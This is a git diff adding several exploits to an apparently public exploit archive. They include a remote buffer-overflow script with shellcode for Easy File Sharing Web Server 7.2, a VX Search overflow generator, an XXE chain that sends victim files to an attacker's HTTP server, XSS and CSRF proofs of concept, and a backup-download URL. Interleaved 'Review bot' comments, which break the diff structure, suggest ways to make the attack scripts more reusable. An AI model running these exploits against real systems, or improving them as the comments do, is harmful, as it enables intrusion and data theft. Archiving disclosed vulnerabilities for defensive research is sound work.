+">
+
+3. Timeline
+8-3-2018 - Report on their Github. (
+https://github.com/coffnix/mysar-ng/issues/12)
+-- 1 month later, no any response from vendor. --
+14-4-2018 - Public.
\ No newline at end of file
diff --git a/exploits/php/webapps/44484.txt b/exploits/php/webapps/44484.txt
new file mode 100644
index 000000000..c4b1f3467
--- /dev/null
+++ b/exploits/php/webapps/44484.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Rvsitebuilder CMS Database Backup Download
+# Exploit Author: Hesam Bazvand
+# Contact: black.king066@gmail.com
+# Software Link: http://www.rvsitebuilder.com
+# Version: All Version
+# Tested on: Windows 7 / Kali Linux
+# Category: WebApps
+# Dork : inurl:rvsindex.php & /rvsindex.php?/user/login
+
+*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
+
+Exploit :
+ Http://Target/rvsDbBackup.sql
\ No newline at end of file
diff --git a/exploits/php/webapps/44486.txt b/exploits/php/webapps/44486.txt
new file mode 100644
index 000000000..18a84dbbe
--- /dev/null
+++ b/exploits/php/webapps/44486.txt
@@ -0,0 +1,28 @@
+########################################################################
+# Exploit Title: Match Clone Script 1.0.4 - Cross-Site Scripting
+# Date: 23.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/match-clone/
+# Category: Web Application
+# Exploit Author: ManhNho
+# Version: 1.0.4
+# Tested on: Window 10 / Kali Linux
+# CVE: CVE-2018-9857
+##########################################################################
+Description
+------------------------
+PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to
+searchbyid.php (aka the "View Search By Id" screen).
+
+Proof of Concept
+------------------------
+1. Access to site
+2. Choose “Search”
+3. Choose "View Search By Id"
+3. Put in search field
+4. You will be having a popup: ManhNho
+
+References:
+------------------------
+https://pastebin.com/Y9uEC4nu
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9857
\ No newline at end of file
diff --git a/exploits/php/webapps/44489.txt b/exploits/php/webapps/44489.txt
new file mode 100644
index 000000000..b64ed4969
--- /dev/null
+++ b/exploits/php/webapps/44489.txt
@@ -0,0 +1,159 @@ +# Exploit Title: CalderaForms 1.5.9.1 - multiple XSS +# Date: 02-03-2018 +# Exploit Author: Federico Scalco +# fscalco at mentat dot is +# @mindpr00f +# Vendor Homepage: https://calderaforms.com/ +# Software Link: https://wordpress.org/plugins/caldera-forms/ +# Vulnerable App: https://github.com/CalderaWP/Caldera-Forms/archive/1.5.9.1.zip +# Version: 1.5.9.1 (older versions may also be affected) +# Tested on: WordPress 4.9.4 +# CVE : CVE-2018-7747 + + + +1) SOFTWARE DESCRIPTION +"Caldera Form is a free and powerful WordPress plugin that creates +responsive forms with a simple drag and drop editor." +It is reported to have 100,000+ active installations at the moment of this +writing. + + + +2) VULNERABILITY OVERVIEW +The application fails to validate user-supplied input, hence it stores the +unsanitized buffer in the database. +The vulnerabilities reported here will be exploitable ONLY if certain +conditions are met, which is not the case in a CF's default configuration +(although still being vulnerable). + +A note on buffers containing strings: + single (') and double (") quotes are correctly escaped, backticks (`) +are not. + + + +3) DETAILS + +3.a) Stored XSS - public +When submitting a CF form, the plugin will show a greeting message to +notify the user that everything went ok. +This message is editable by the site's admin and can contain part of the +user-supplied data (e.g. they're first name). In this case, simply inject +HTML code into the parameter which gets returned in the greeting message +and submit the POST request. A JSON response will follow, containing, among +other data: +- the greeting message ("html", which contains the malicious payload that +gets executed right away) +- form's ID ("form_id") +- data's ID ("cf_id") + +{ + "data":{"cf_id":""}, + "html":"", + "type":"...", + "form_id":"", + "form_name":"...", + "status":"..." +} + +At this point, to reach the stored XSS, simply build a GET request using +the obtained data. 
+The malicious payload will be found at + + http(s):///cf-api//?cf_su=1&cf_id= + +Vulnerable config: + - form > form settings > capture entries > checked (ON by default) + - form > form settings > success message > add some of the user +supplied fields (absent by default) + +To replicate this on a fresh install: + - Create a new, default, contact form + - Go to "Form Settings" tab and edit the success message to include, +for example, the user's first name. +e.g.: Form has been successfully submitted. Thank you %first_name%. + - Save & publish + - As an unauthenticated user, submit the contact form injecting HTML +code in first name's parameter. XSS will be triggered right away + - To recall the payload as a stored XSS, read the POST's response and +point your browser to + /cf-api//?cf_su=1&cf_id= + + + +3.b) Stored XSS - admin interface +CalderaForms gives the ability to notify the admin via email everytime a +form gets submitted. +Furthermore, an admin can choose to enable an "email transacion log" for +debugging purposes (disabled by default). +If this configuration is in place, a copy of the malicious payload +described above will be shown in the administration panel, when visiting +that form's malicious entry's details. + +Vulnerable config: + - form > form settings > capture entries > checked (ON by default) + - form > email > debug mailer > checked (OFF by default) + +To replicate this on a fresh install: + - Enable the transaction log (form -> edit -> email tab -> check +"Enable email send transaction log") + - Replicate the injection described at 3.a (all fields can be used this +time) as an unauthenticated user + - Back again in the admin interface, visit form's entries, identify the +malicious one and click on the "view" button + + This will pop a details window and trigger the XSS. + + + +3.c) Importing a weaponized form - admin interface +CalderaForms gives the ability to import a form (JSON format). 
+A malicious form field can be crafted which will trigger an XSS when said +field gets displayed/edited after the import. + +It's worth noting that this flaw does not depend on custom configurations, +although it's not "remotely" and "automatically" exploitable. The problem +here arise, for example, when an admin imports a malicious JSON. + +To replicate this on a fresh install: + - Create a form and export it (JSON format) + - Edit the json and inject HTML code. "label" and "slug" parameters +were tested, others may be vulnerable too. + e.g.: + { + ... + "label":"First Name", + "slug":"first_name\"/>" + ... + } + + - Import the malicious form to trigger the XSS in the administration +interface + + + +4) REMEDIATION +Update to the latest version available. + +If any personalized configuration is found exploitable, the following steps +can be followed, as a temporary mitigation strategy, if no update is +available or updating is not an option, for whatever reason: + - for every form, under "Form Settings", prune every variable that gets +returned to the user as a success message + - for every form, under the "Email" tab, un-check "Enable email send +transaction log" + - for every form that gets imported perform a thorough review + + + +5) TIMELINE & FINAL NOTES + + 02-03-18 > vendor gets notified + 06-03-18 > vendor replies + 07-03-18 > CVE requested and assigned + 27-03-18 > patch released + 27-03-18 > vulnerability disclosed + +Special thanks go to Josh Pollock and his team, from Caldera, who invested +passion and energy in understanding and patching these issues. \ No newline at end of file diff --git a/exploits/php/webapps/44492.txt b/exploits/php/webapps/44492.txt new file mode 100644 index 000000000..85860053c --- /dev/null +++ b/exploits/php/webapps/44492.txt 
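Review bot: The remediation section says only `Update to the latest version available` even though the timeline records a patch on 27-03-18; name the first fixed release so readers can check an installed site against it, e.g. `Fixed in: <version released 27-03-18> and later` with the real number filled in. The interim mitigations could also include the stronger step that the advisory's own "Vulnerable config" lists for 3.a and 3.b imply: with "capture entries" unchecked the submitted payload is not kept, so `- for every form that does not need stored entries, under "Form Settings", un-check "capture entries"` removes the stored vector rather than only pruning success-message variables. The note in section 2 that backticks are not escaped presumably matters only where a stored value lands inside a JavaScript template literal; saying in which of the three scenarios that was observed, or that it was not, would keep readers from over- or under-estimating it.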
@@ -0,0 +1,68 @@ +####################################### +# Exploit Title: Joomla! Component Js Jobs - Multiple Cross Site Request Forgery Vulnerabilities +# Google Dork: N/A +# Date: 17-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni# +####################################### +# Author Blog : http://nullnews.in +# Vendor Homepage: https://www.joomsky.com +# Software Link: https://extensions.joomla.org/extension/js-jobs/ +# Affected Version: 1.2.0 +# Category: WebApps +# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 +# CVE : NA +####################################### + +1. Vendor Description: + +JS Jobs for any business, industry body or staffing company wishing to +establish a presence on the internet. JS Jobs allows you to run your own, +unique jobs classifieds service where you or employer can advertise their +jobs and job seekers can upload their Resumes. + +2. Technical Description: + +The state changing actions in JS Jobs before 1.2.1 not having any random +token validation which results in Cross Site Request Forgery Vulnerability. + +3. Proof of Concept: + +Delete Job Entry [Super Admin Access] + + + + +
+ + + + + + + + + + + + + + + + + + + + + + +
+ + + +4. Solution: + +Update to latest version + +https://extensions.joomla.org/extension/js-jobs/ \ No newline at end of file diff --git a/exploits/windows/dos/44494.py b/exploits/windows/dos/44494.py new file mode 100755 index 000000000..afc110c3e --- /dev/null +++ b/exploits/windows/dos/44494.py @@ -0,0 +1,23 @@ +#!/usr/bin/python +# Title: VX Search 10.6.18 Local Buffer Overflow +# Author: Kevin McGuigan +# Twitter: @_h3xagram +# Author Website: https://www.7elements.co.uk +# Vendor Website: http://www.vxsearch.com +# Version: 10.6.18 +# Date: 18/04/2018 +# Tested on: Windows 7 32-bit +# Vendor did not respond to advisory. + +# Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field. + +filename="vxsearchPOC.txt" +junk = "A"*271 +#0x652c2a1a : "jmp esp" | asciiprint,ascii {PAGE_READONLY}[QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS:False, v4.3.4.0 (C:\Program Files\VX SearchServer\bin\QtGui4.dll) +#eip="\x1a\x2a\x2c\x65" +eip = "B" * 4 +fill = "C" *900 +buffer = junk + eip + fill +textfile = open(filename , 'w') +textfile.write(buffer) +textfile.close() \ No newline at end of file diff --git a/exploits/windows/remote/44485.py b/exploits/windows/remote/44485.py new file mode 100755 index 000000000..e0fe1aa14 --- /dev/null +++ b/exploits/windows/remote/44485.py 
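Review bot: The solution section of the JS Jobs advisory says only `Update to latest version`, while the technical description pins the defect to versions `before 1.2.1`; state the fixed release explicitly, `Fixed in: 1.2.1`, so readers can verify an install. The proof of concept is reduced to an HTML form that is not visible in this hunk, so the endpoint, HTTP method and the parameter identifying the job to delete are documented nowhere in the text; list them in prose next to the form together with the privilege required, which the heading gives as Super Admin. The title promises multiple CSRF vulnerabilities but only the delete action is demonstrated; either name the other state-changing actions that were confirmed to lack a token or narrow the title.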
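Review bot: `textfile = open(filename , 'w')` writes the payload in text mode, and the script is meant to run on Windows (`# Tested on: Windows 7 32-bit`), where text mode rewrites any `\n` byte as `\r\n`; the current `A`/`B`/`C` filler is unaffected, but as soon as the commented-out `eip` address or a shellcode containing `0x0a` is used the offsets shift silently. Open the file in binary mode and let the context manager close it: `with open(filename, 'wb') as textfile:` / `    textfile.write(buffer)` (the buffer is a `str`, which is what a `'wb'` file accepts under the Python 2 the shebang implies; under Python 3 it would need to be bytes). The usage comment names `vxsearchpoc.txt` while the script writes `vxsearchPOC.txt`; pick one spelling. A one-line comment that 271 is the offset to the saved return address as measured for 10.6.18 on the stated platform would document why that constant is what it is.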
@@ -0,0 +1,67 @@
+# Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow
+# Date: 03/24/2018
+# Exploit Author: rebeyond - http://www.rebeyond.net
+# Vendor Homepage: http://www.sharing-file.com/
+# Software Link: http://www.sharing-file.com/efssetup.exe
+# Version: 7.2
+# CVE: CVE-2018-9059
+# Tested on: Windows XP Professional SP3
+#
+# Description:
+# Attackers just need to construct a malicious login request packet,and send the packet to the server.The server can be pwned
+#
+#
+# The stack trace is as follows:
+# (40d8.2980): Access violation - code c0000005 (first chance)
+# r
+# eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0
+# eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc
+# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll -
+# sqlite3!sqlite3_errcode+0x8e:
+# 61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????
+#
+# kb
+# ChildEBP RetAddr Args to Child
+# WARNING: Stack unwind information not available. Following frames may be wrong.
+# 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e
+# *** WARNING: Unable to verify checksum for fsws.exe
+# *** ERROR: Module load completed but symbols could not be loaded for fsws.exe
+# 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282
+# 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4
+# 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3
+
+
+import requests
+host='192.168.50.30'
+port='80'
+
+buf='A'*4071
+buf +='\x12\x45\xfa\x7f' #jmp esp
+buf +='A'*12
+buf +='\xeb\x36' #jmp 0x36
+buf +='A'*42
+buf +='\x60\x30\xc7\x61'*2 #must be valid address
+buf +='A'*4
+#shellcode to execute calc.exe on remote server
+buf += "\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x24\xa7\x26\xec\x33"
+buf += "\xc9\xb1\x31\x31\x58\x18\x03\x58\x18\x83\xe8\xd8\x45"
+buf += "\xd3\x10\xc8\x08\x1c\xe9\x08\x6d\x94\x0c\x39\xad\xc2"
+buf += "\x45\x69\x1d\x80\x08\x85\xd6\xc4\xb8\x1e\x9a\xc0\xcf"
+buf += "\x97\x11\x37\xe1\x28\x09\x0b\x60\xaa\x50\x58\x42\x93"
+buf += "\x9a\xad\x83\xd4\xc7\x5c\xd1\x8d\x8c\xf3\xc6\xba\xd9"
+buf += "\xcf\x6d\xf0\xcc\x57\x91\x40\xee\x76\x04\xdb\xa9\x58"
+buf += "\xa6\x08\xc2\xd0\xb0\x4d\xef\xab\x4b\xa5\x9b\x2d\x9a"
+buf += "\xf4\x64\x81\xe3\x39\x97\xdb\x24\xfd\x48\xae\x5c\xfe"
+buf += "\xf5\xa9\x9a\x7d\x22\x3f\x39\x25\xa1\xe7\xe5\xd4\x66"
+buf += "\x71\x6d\xda\xc3\xf5\x29\xfe\xd2\xda\x41\xfa\x5f\xdd"
+buf += "\x85\x8b\x24\xfa\x01\xd0\xff\x63\x13\xbc\xae\x9c\x43"
+buf += "\x1f\x0e\x39\x0f\x8d\x5b\x30\x52\xdb\x9a\xc6\xe8\xa9"
+buf += "\x9d\xd8\xf2\x9d\xf5\xe9\x79\x72\x81\xf5\xab\x37\x7d"
+buf += "\xbc\xf6\x11\x16\x19\x63\x20\x7b\x9a\x59\x66\x82\x19"
+buf += "\x68\x16\x71\x01\x19\x13\x3d\x85\xf1\x69\x2e\x60\xf6"
+buf += "\xde\x4f\xa1\x95\x81\xc3\x29\x74\x24\x64\xcb\x88"
+
+cookies = dict(SESSIONID='6771', UserID=buf,PassWD='')
+data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
+requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)
\ No newline at end of file
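Review bot: `requests.post(...)` on the last line carries no `timeout`, and since a successful overflow diverts the server into the shellcode the response may never arrive, so the script hangs instead of returning; pass `timeout=10` (a `requests.exceptions.ReadTimeout` after that is the expected outcome, not an error). `host` and `port` are hard-coded to `192.168.50.30`/`80`; taking them from the command line, `host, port = sys.argv[1], sys.argv[2]` after an `import sys`, makes the script usable without editing. The header description says only "a malicious login request packet"; the code shows the overflow is in the `UserID` cookie of a POST to `/forum.ghp`, which belongs in the description and as a comment on the `cookies = dict(...)` line. The addresses `\x12\x45\xfa\x7f` and `\x60\x30\xc7\x61` are evidently specific to the Windows XP SP3 target named in the header; the comments should say which module each was taken from so they can be re-resolved for another build.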
diff --git a/exploits/xml/webapps/44493.txt b/exploits/xml/webapps/44493.txt
new file mode 100644
index 000000000..e15eca059
--- /dev/null
+++ b/exploits/xml/webapps/44493.txt
@@ -0,0 +1,97 @@ +# Exploit Author: bzyo +# CVE: CVE-2018-10077, CVE-2018-10078, CVE-2018-10079 +# Twitter: @bzyo_ +# Exploit Title: Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities +# Date: 04-17-18 +# Vulnerable Software: WatchDog Console - 3.2.2 +# Vendor Homepage: http://www.itwatchdogs.com/ +# Version: 3.2.2 +# Software Link: http://www.itwatchdogs.com/userfiles/file/firmware/Console/WatchDogConsoleInstaller_v3.2.2.exe +# Tested On: Windows 7 x86 + +Description +----------------------------------------------------------------- +WatchDog Console suffers from multiple vulnerabilities: + +# CVE-2018-10077 Authenticated XML External Entity (XXE) +# CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) +# CVE-2018-10079 Insecure File Permissions + +Prerequisites +----------------------------------------------------------------- +To successfully exploit these vulnerabilities, an attacker must already have access +to a system running WatchDog Console using a low-privileged user account + +Proof of Concepts +----------------------------------------------------------------- +### CVE-2018-10079 Insecure File Permissions ### +By default, WatchDog Console 3.2.2 installs all configuration data at 'C:\ProgramData\WatchDog Console' and +gives 'Authenticated Users' group Modify permissions + +C:\>icacls "c:\ProgramData\WatchDog Console" +c:\ProgramData\WatchDog Console NT AUTHORITY\Authenticated Users:(OI)(CI)(M,DC) + +This allows any local user of the system the ability to reset the application admin password by generating +a password using the PHP md5() function and updating the config.xml file. 
It also provides the ability to +add data to servers.xml for both CVE-2018-10078 and CVE-2018-10079 or through the application interface + +### CVE-2018-10077 Authenticated XML External Entity (XXE) ### +With authenticated admin access to the application or local access to the system, a user has the ability to read +system files remotely through XXE + +On attacking machine +- Create data.xml with following contents in apache root and start apache listening on 80 + + + + %sp; + %param1; + ]> + &exfil; + +- Create evil.xml with the following contents anywhere + + + "> + +- Start python simple http server in same directory as evil.xml, listening on 8080 + python -m SimpleHTTPServer 8080 + +On victim machine (1 of 2 ways) +1. With admin access to application console, add attacking server IP address under servers tab +or +2. With local access to system + - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following: + + + + + - restart system + +On attacking machine +- Contents of 'win.ini' is outputted to console +- evil.xml can be updated to read other sensitive files (tested reading file from admin desktop) + +### CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) ### +This application suffers from authenticated XSS on several inputs (1 of 2 ways) +1. With admin access to application console, under servers tab + - add dummy IP in server name filed + - add "> into server description +or +2. With local access to system + - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following: + + + " selEmail="True" Username="1" Password="1" left="400" top="180" /> + + - restart system + +3. popup with cookie appears when browsing from Overview, Dashboard, and Server tabs. Remains after reboot. + +Timeline +--------------------------------------------------------------------- +04-14-18: Vendor notified of vulnerabilities +04-16-18: Vendor responded "Thank you for bringing this to our attention. 
The product has now been End-of-life for
+several years and is no longer receiving updates."
+04-17-18: Submitted public disclosure
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b411eb0c0..6487d1450 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5938,6 +5938,9 @@ id,file,description,date,author,type,platform,port
 44466,exploits/windows/dos/44466.txt,"Microsoft Windows - 'CiSetFileCache' TOCTOU Incomplete Fix",2018-04-16,"Google Security Research",dos,windows,
 44467,exploits/windows/dos/44467.txt,"Microsoft Edge - 'OpenProcess()' ACG Bypass",2018-04-16,"Google Security Research",dos,windows,
 44468,exploits/windows/dos/44468.py,"Zortam MP3 Media Studio 23.45 - Local Buffer Overflow (SEH)",2018-04-16,"Kevin McGuigan",dos,windows,
+44490,exploits/linux/dos/44490.txt,"PDFunite 0.41.0 - '.pdf' Local Buffer Overflow",2018-04-18,Hamm3r.py,dos,linux,
+44491,exploits/multiple/dos/44491.txt,"RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow",2018-04-18,Hamm3r.py,dos,multiple,
+44494,exploits/windows/dos/44494.py,"VX Search 10.6.18 - 'directory' Local Buffer Overflow",2018-04-18,"Kevin McGuigan",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
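Review bot: In the CVE-2018-10079 section the cross-reference `for both CVE-2018-10078 and CVE-2018-10079` looks wrong: editing servers.xml is the local-access route for the XXE (CVE-2018-10077) and the stored XSS (CVE-2018-10078), while CVE-2018-10079 is the permissions issue itself, so the line should read `for both CVE-2018-10077 and CVE-2018-10078`. Because the vendor reply says the product is end-of-life, the advisory leaves readers with no fix; a mitigation paragraph would help, for example removing the Modify entry for Authenticated Users on `C:\ProgramData\WatchDog Console` (`icacls "C:\ProgramData\WatchDog Console" /remove:g "Authenticated Users"` or the folder's Security tab) so only administrators and the service account can write config.xml and servers.xml, plus restricting who can reach the console, since the XXE exfiltrates file contents to whatever server address is entered on the servers tab. The Prerequisites paragraph says a low-privileged local account suffices, yet the XXE and XSS steps need either admin access to the console or the write access that CVE-2018-10079 provides; spelling out that the permissions flaw is what lets a low-privileged user reach the other two would make the attack chain clear.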
@@ -16413,7 +16416,8 @@ id,file,description,date,author,type,platform,port
 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
 44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
 44473,exploits/hardware/remote/44473.txt,"D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting",2018-04-17,"Sayan Chatterjee",remote,hardware,
-44482,exploits/php/remote/44482.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
+44482,exploits/php/remote/44482.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
+44485,exploits/windows/remote/44485.py,"Easy File Sharing Web Server 7.2 - Stack Buffer Overflow",2018-04-18,rebeyond,remote,windows,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39095,6 +39099,7 @@ id,file,description,date,author,type,platform,port
 44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware,
 44317,exploits/hardware/webapps/44317.py,"Intelbras Telefone IP TIP200 LITE - Local File Disclosure",2018-03-20,anhax0r,webapps,hardware,
 44318,exploits/php/webapps/44318.txt,"Vehicle Sales Management System - Multiple Vulnerabilities",2018-03-20,Sing,webapps,php,
+44320,exploits/hardware/webapps/44320.txt,"Coship RT3052 Wireless Router - Persistent Cross-Site Scripting",2018-03-20,"Sayan Chatterjee",webapps,hardware,
 44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,
 44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml,
 44346,exploits/php/webapps/44346.rb,"ClipBucket - beats_uploader Unauthenticated Arbitrary File Upload (Metasploit)",2018-03-27,Metasploit,webapps,php,
@@ -39169,7 +39174,15 @@ id,file,description,date,author,type,platform,port
 44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
 44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
 44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
-44449,exploits/php/webapps/44449.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
+44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
 44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80
 44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,
 44471,exploits/php/webapps/44471.txt,"Joomla! 
Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php,
+44483,exploits/php/webapps/44483.txt,"MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting",2018-04-18,"Keerati T.",webapps,php,80
+44484,exploits/php/webapps/44484.txt,"Rvsitebuilder CMS - Database Backup Download",2018-04-18,"Hesam Bazvand",webapps,php,
+44486,exploits/php/webapps/44486.txt,"Match Clone Script 1.0.4 - Cross-Site Scripting",2018-04-18,ManhNho,webapps,php,80
+44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,
+44488,exploits/hardware/webapps/44488.py,"Lutron Quantum 2.0 - 3.2.243 - Information Disclosure",2018-04-18,SadFud,webapps,hardware,
+44489,exploits/php/webapps/44489.txt,"WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting",2018-04-18,"Federico Scalco",webapps,php,80
+44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80
+44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,